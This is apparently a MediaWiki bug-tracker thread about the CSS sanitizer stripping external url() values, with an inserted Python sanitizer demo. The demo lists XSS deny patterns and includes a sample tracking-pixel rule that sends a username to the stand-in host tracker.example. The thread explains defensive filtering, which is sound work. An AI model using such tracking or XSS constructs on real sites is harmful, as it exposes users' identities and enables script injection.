
[CSS] Some CSS stripped by MediaWiki parser CSS sanitizer
Open, LowestPublic

Description

I have been unable to get background-image:url( someURL ) to work with this extension, like below:

{{#css:
	/*
		This code requires the CSS extension (previously used NewPageCSS)
		http://www.mediawiki.org/wiki/Extension:CSS
	*/

	.someClass { background-image:url(http://www.somedomain.com/w/images/0/06/someimage.png); }
}}

I believe it is due to Sanitizer::checkCss() as described by Brion here:

http://www.gossamer-threads.com/lists/wiki/mediawiki/233179

The CSS that gets sanitized by the parser is getting stripped out of the CSS extension too.

However, the usual /* insecure input */ error message appears in the <head> of the page source, like this:

<style type="text/css">
/*<![CDATA[*/
/* insecure input */
/*]]>*/
</style>

The only way to get around this problem is to put the CSS in MediaWiki:Common.css.

There are good reasons for the parser to strip some CSS out, but in addition to documenting this issue (which this bug does, and I'll do in the extension docs in a moment), it should be configurable whether the CSS extension lets the parser sanitize, for example, when used on private wikis.

Details

Reference
bz35820

Event Timeline

bzimport raised the priority of this task to Medium. Nov 22 2014, 12:18 AM
bzimport set Reference to bz35820.
bzimport added a subscriber: Unknown Object (MLST).

There is a proposal to improve Extension:CSS at

http://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Improve_Extension:CSS

Pasting the part related with security to get more feedback:

"The CSS extension relies on basic blacklisting functionality in MediaWiki core to prevent XSS. It would be great if a proper CSS parser [1] was integrated and a set of whitelists implemented to offer various levels of capability/protection trade-offs.

For example, some wikis may want all CSS selectors prefixed with "#mw-content-text" and properties like "position", etc. disabled to limit the effect of styles to the article content. Other sites may want everything except XSS-able properties/values."

[1] https://github.com/sabberworm/PHP-CSS-Parser

(In reply to comment #1)

"The CSS extension relies on basic blacklisting functionality in MediaWiki core to prevent XSS. It would be great if a proper CSS parser [1] was integrated and a set of whitelists implemented to offer various levels of capability/protection trade-offs."

This sounds like a great project. I'd recommend looking at HTML Purifier's CSS rules as well, which would be great to integrate into either the extension, or core's CSS sanitization.

[1] https://github.com/sabberworm/PHP-CSS-Parser

There are good reasons for the parser to strip some CSS out, but in addition to documenting this issue (which this bug does, and I'll do in the extension docs in a moment), it should be configurable whether the CSS extension lets the parser sanitize, for example, when used on private wikis.

The reason the sanitizer doesn't let that through is that we don't want people to be able to load external resources from inline CSS:
*This could in theory be used as a DoS attack against somebody else if someone put it on a popular page.
*It can be used to track users, and associate usernames with IP addresses (i.e. have {{REVISIONUSER}} in the query string of the external resource).

(There could be other reasons. Those two are just the two I know about.)
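The two policies sketched in the mentorship proposal quoted above (scope selectors to "#mw-content-text" and disable properties like "position", or allow everything except XSS-able constructs) and the external-resource rule explained in the comment above can be demonstrated together. The following is an added example written for this page; it is not MediaWiki's Sanitizer::checkCss, not code from Extension:CSS, and not the sabberworm parser. The Policy class, the function names, the rejection messages and the sample stylesheet (the task's own rule plus a same-origin image, a tracking pixel whose query string carries a username the way {{REVISIONUSER}} would, and a position: fixed overlay) are all constructed here. The brace-matching splitter is a deliberate simplification standing in for the proper CSS parser the proposal asks for; it refuses anything it cannot parse flatly rather than guessing.

```python
import re
from dataclasses import dataclass

# Hypothetical policy object; its knobs are the trade-offs discussed in this task.
@dataclass(frozen=True)
class Policy:
    blocked_properties: frozenset = frozenset()  # e.g. {'position'}: keep styles in the flow
    allowed_url_hosts: frozenset = frozenset()   # hosts values may fetch from; same-origin paths always pass
    selector_prefix: str = ''                    # e.g. '#mw-content-text': confine styles to the article

XSS_PROPERTIES = frozenset({'behavior', '-ms-behavior', '-moz-binding'})  # no policy re-enables these
ESCAPE_RE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\r\n]?|\\(.)', re.S)
COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
ABS_URL_RE = re.compile(r'//([^/\s\'")]+)')  # any authority: url(http://h/), src("//h/"), bare //h
DANGEROUS_RE = re.compile(r'expression\s*\(|@import|(?:javascript|vbscript|data)\s*:', re.I)
SELECTOR_RE = re.compile(r'^[A-Za-z0-9_\-.#:>+~*\s,\[\]=]+$')  # no quotes, parens or slashes
PROPERTY_RE = re.compile(r'^-?[A-Za-z][A-Za-z0-9\-]*$')

def decode_escapes(css: str) -> str:
    """Resolve backslash escapes before anything else, so u\\72l( is seen as url(."""
    def repl(m):
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else '\ufffd'
        return m.group(2)
    return ESCAPE_RE.sub(repl, css)

def parse_rules(css: str) -> list:
    """Split flat CSS into (selector, body) pairs by brace matching; nesting, at-rule blocks and stray text are errors."""
    rules, depth, sel_start, body_start = [], 0, 0, 0
    for i, ch in enumerate(css):
        if ch == '{':
            depth, body_start = depth + 1, i + 1
        elif ch == '}':
            depth -= 1
            rules.append((css[sel_start:body_start - 1], css[body_start:i]))
            sel_start = i + 1
        if depth not in (0, 1):
            raise ValueError('nested block or unbalanced braces')
    if depth != 0 or css[sel_start:].strip():
        raise ValueError('unbalanced braces or text outside a rule')
    return rules

def check_declaration(decl: str, policy: Policy) -> tuple:
    """Return (normalized declaration, None) or (None, reason); same-origin paths pass, any //host must be allow-listed."""
    if ':' not in decl:
        return None, 'malformed declaration %r' % decl.strip()
    prop, value = (part.strip() for part in decl.split(':', 1))
    prop = prop.lower()
    if not PROPERTY_RE.match(prop):
        return None, 'malformed property name %r' % prop
    if prop in XSS_PROPERTIES or prop in policy.blocked_properties:
        return None, 'property %s blocked' % prop
    if '\\' in value:  # a surviving backslash would be decoded again by the browser
        return None, '%s: unexpected escape' % prop
    bad = DANGEROUS_RE.search(value)
    if bad:
        return None, '%s: XSS-able construct %r' % (prop, bad.group(0))
    for authority in ABS_URL_RE.findall(value):
        host = authority.rsplit('@', 1)[-1].split(':', 1)[0].lower()
        if host not in policy.allowed_url_hosts:
            return None, '%s: external resource on host %s' % (prop, host)
    return '%s: %s' % (prop, value), None

def sanitize(css: str, policy: Policy) -> tuple:
    """Return (clean CSS, rejection reasons); the whole input is dropped on structural errors."""
    text = COMMENT_RE.sub(' ', decode_escapes(css))
    try:
        rules = parse_rules(text)
    except ValueError as err:
        return '', ['structure: %s' % err]
    kept, rejections = [], []
    for selector, body in rules:
        selector = ' '.join(selector.split())
        if not selector or not SELECTOR_RE.match(selector):
            rejections.append('selector %r rejected' % selector)
            continue
        if policy.selector_prefix:
            selector = ', '.join(policy.selector_prefix + ' ' + s.strip() for s in selector.split(','))
        decls = []
        for decl in filter(str.strip, body.split(';')):
            norm, reason = check_declaration(decl, policy)
            (decls if norm else rejections).append(norm or reason)
        if decls:
            kept.append('%s { %s }' % (selector, '; '.join(decls)))
    return '\n'.join(kept), rejections

def demo() -> tuple:
    """Constructed stylesheet (the task's rule, a same-origin image, an escaped tracking pixel carrying a username, a fixed overlay) under two policies."""
    css = '''
    .someClass { background-image:url(http://www.somedomain.com/w/images/0/06/someimage.png); }
    .local { background-image: url(/w/images/0/06/someimage.png); color: red }
    .tracker { background: u\\72l("//tracker.example/?u=Alice") }
    .fixed { position: fixed; top: 0 }
    '''
    private_wiki = Policy(allowed_url_hosts=frozenset({'www.somedomain.com'}))
    locked_down = Policy(blocked_properties=frozenset({'position'}), selector_prefix='#mw-content-text')
    return sanitize(css, private_wiki), sanitize(css, locked_down)
```

Calling demo() shows the two ends of the trade-off: the private-wiki policy lets the task's background-image through because www.somedomain.com is allow-listed, but still drops the tracking pixel (written as u\72l( to show why escapes must be decoded before any pattern check); the locked-down policy rejects both external loads, drops position while keeping the rest of that rule, and prefixes every surviving selector with #mw-content-text. Rejections come back as a list rather than the bare "/* insecure input */" the core sanitizer emits, so an editor can see which declaration was stripped and why.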

Bug 57891 is not an appropriate "see also"; removing.

A new round of FOSS OPW is coming. Should we keep https://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Allowing_3rd_party_wiki_editors_to_run_more_CSS_features as a featured project? Meaning, does this project still make sense and are there mentors still available?

Wikimedia will apply to Google Summer of Code and Outreachy on Tuesday, February 17. If you want this task to become a featured project idea, please follow these instructions.

Qgil lowered the priority of this task from Medium to Lowest. Feb 16 2015, 11:45 PM

This is a message posted to all tasks under "Re-check in September 2015" at Possible-Tech-Projects. Outreachy-Round-11 is around the corner. If you want to propose this task as a featured project idea, we need a clear plan with community support, and two mentors willing to support it.

This is a message sent to all Possible-Tech-Projects. The new round of Wikimedia Individual Engagement Grants is open until 29 Sep. For the first time, technical projects are within scope, thanks to the feedback received at Wikimania 2015, before, and after (T105414). If someone is interested in obtaining funds to push this task, this might be a good way.

This seems to be an old task with no input for 2 years.
Is this still valid? Is there demand for this?

Qgil set Security to None.

Maybe the initial task is still valid, but I agree that no real movement in years doesn't make it an ideal candidate for Possible-Tech-Projects. If mentors related to MediaWiki-extensions-CSS want to bring it back, they are welcome.